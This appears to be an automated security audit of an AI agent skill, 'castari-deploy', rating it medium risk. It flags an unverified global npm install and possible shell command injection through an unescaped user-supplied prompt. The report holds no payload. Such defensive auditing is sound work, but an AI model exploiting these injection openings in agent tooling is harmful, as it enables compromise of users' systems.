castari-deploy
Warn
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: MEDIUMEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- EXTERNAL_DOWNLOADS (MEDIUM): The skill instructs the agent to run
npm install -g @castari/cli. As the@castariorganization is not part of the trusted sources list, this constitutes an unverified dependency installation that could potentially execute malicious post-install scripts. - COMMAND_EXECUTION (LOW): In Step 6, the skill executes
cast invoke <agent-slug> "<test-prompt>"where<test-prompt>is obtained viaAskUserQuestion. There is no evidence of sanitization or escaping for shell metacharacters, creating a surface for command injection if an attacker provides a malicious prompt. - DATA_EXFILTRATION (SAFE): The skill facilitates authentication using
cast login, which leverages an external OAuth flow. It does not attempt to access sensitive local files such as SSH keys, environment variables, or AWS credentials directly. - PROMPT_INJECTION (SAFE): No instructions were found that attempt to override the AI agent's system prompt, bypass safety filters, or extract internal configuration.
Audit Metadata